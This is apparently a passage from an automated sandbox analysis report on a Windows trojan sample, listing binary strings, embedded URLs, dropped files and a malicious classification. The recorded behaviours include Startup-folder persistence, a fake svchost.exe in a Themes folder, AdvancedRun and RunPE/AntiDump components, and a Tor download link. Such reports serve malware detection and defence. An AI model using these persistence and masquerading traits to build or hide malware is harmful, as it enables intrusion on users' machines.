                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbDriverData=C:\Windows\System32\Drivers\DriverData source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb(m source: svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbs source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbZS!'~< source: VknMvPoCXZ.exe, 00000001.00000000.359026975.0000000000AC8000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbpdbtry.pdb_ source: VknMvPoCXZ.exe, 00000001.00000002.568888200.0000000000A84000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.DevOps.Telemetry.pdbS source: VknMvPoCXZ.exe, 00000001.00000000.524070618.0000000006EAB000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb(m source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: o.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: VknMvPoCXZ.PDB source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: symbols\dll\System.Windows.Forms.pdbvs. source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: iHC:\Windows\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdb25563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000028.00000002.588815197.0000000007E00000.00000004.00000001.sdmp
                      Source: Binary string: System.Windows.Forms.pdbease\obj\Telemetry\Microsoft.VisualStudio.DevOps.Telemetry.pdbM( source: VknMvPoCXZ.exe, 00000001.00000000.348782222.00000000006F7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000000.398669048.0000000000A1F000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp
                      Source: Binary string: svchost.PDB source: svchost.exe, 00000028.00000002.557448296.0000000000938000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: VknMvPoCXZ.exe, 00000001.00000002.593745881.0000000006E5A000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.588850055.0000000007E08000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File opened: C:\Users\user\AppData\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File opened: C:\Users\user\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                      Source: svchost.exe, 00000004.00000002.565621441.0000028D9A48A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: svchost.exe, 00000004.00000002.565621441.0000028D9A48A000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: svchost.exe, 00000004.00000002.563938277.0000028D9A40F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ver)
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: VknMvPoCXZ.exe, 00000001.00000003.244837348.000000000082D000.00000004.00000001.sdmp | String found in binary or memory: http://en.w
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.sectigo.com0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.251876624.00000000055DD000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: VknMvPoCXZ.exe, 00000001.00000003.251440194.00000000055D9000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers19
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comicva
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comm
                      Source: VknMvPoCXZ.exe, 00000001.00000000.483452805.00000000055D0000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.comue
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245502248.00000000055EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.comc
                      Source: VknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000003.247622790.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
                      Source: VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: VknMvPoCXZ.exe, 00000001.00000003.247610045.000000000560D000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cnf
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/5.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/H.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/c.
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/curs
                      Source: VknMvPoCXZ.exe, 00000001.00000003.249086736.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.248063336.00000000055D4000.00000004.00000001.sdmp | String found in binary or memory: http://www.microsoftc.
                      Source: AdvancedRun.exe, AdvancedRun.exe, 00000007.00000000.273104698.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: http://www.nirsoft.net/
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmp, VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245404887.00000000055EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.comnt
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krB2
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.krlea
                      Source: VknMvPoCXZ.exe, 00000001.00000003.246740797.00000000055D6000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kropyw2-
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
                      Source: VknMvPoCXZ.exe, 00000001.00000003.245836341.00000000055EB000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.comnm
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
                      Source: VknMvPoCXZ.exe, 00000001.00000002.592389757.00000000067E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.comr
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000009.00000002.560698282.000002BA27C3E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000B.00000002.310038387.0000021F0B45C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.308621783.0000021F0B45A000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000B.00000003.307595739.0000021F0B461000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe | String found in binary or memory: https://mhconsultores.net.ve/
                      Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0C
                      Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.582962680.0000000003E21000.00000004.00000001.sdmp | String found in binary or memory: https://sectigo.com/CPS0D
                      Source: svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000B.00000002.309883940.0000021F0B413000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.309965509.0000021F0B43D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.308834752.0000021F0B445000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000B.00000003.284686456.0000021F0B431000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000B.00000003.307917223.0000021F0B447000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: VknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: powershell.exe | Process created: 46

                      System Summary:

                      .NET source code contains very large array initializations
Source: VknMvPoCXZ.exe, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: 481F404B.exe.1.dr, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: svchost.exe.1.dr, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: 1.2.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: 1.0.VknMvPoCXZ.exe.200000.0.unpack, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: 1.0.VknMvPoCXZ.exe.200000.13.unpack, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: 1.0.VknMvPoCXZ.exe.200000.15.unpack, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: 1.0.VknMvPoCXZ.exe.200000.1.unpack, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: 24.0.481F404B.exe.a50000.0.unpack, u0039BD3B5D7/C84CE241.cs | Large array initialization: System.UInt32[] 9BD3B5D7.C84CE241::ED7157B5: array initializer size 106396
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Code function: 1_2_002A55BB
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Code function: 1_2_002A098B
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Code function: 1_2_024CC1F0
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Code function: 40_2_0057098B
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Code function: 40_2_005755BB
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Code function: 40_2_011E98B0
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Code function: 40_2_07056928
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Code function: 40_2_0705C819
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Code function: 40_2_07057090
Source: AdvancedRun.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.1.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.24.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AdvancedRun.exe.24.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: VknMvPoCXZ.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File created: C:\Windows\Resources\Themes\aero\Shell\4B6A7152
Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | Code function: String function: 0040B550 appears 50 times
Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameAntiDump.dll2 vs VknMvPoCXZ.exe
Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameRunPE_MemoryProtection.exe4 vs VknMvPoCXZ.exe
Source: VknMvPoCXZ.exe, 00000001.00000000.556973630.0000000007F3B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameMicrosoft.VisualStudio.DevOps.Telemetry.dllP vs VknMvPoCXZ.exe
Source: VknMvPoCXZ.exe, 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamevxrSmzjNKOKDOsAsVgFGKyJwRVHn.exe4 vs VknMvPoCXZ.exe
Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp | Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs VknMvPoCXZ.exe
Source: VknMvPoCXZ.exe, 00000001.00000000.429223555.00000000036E9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs VknMvPoCXZ.exe
Source: VknMvPoCXZ.exe | Static PE information: invalid certificate
Source: VknMvPoCXZ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
Source: classification engine | Classification label: mal100.troj.adwa.expl.evad.winEXE@113/58@0/2
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | Code function: 6_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | Code function: 6_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,
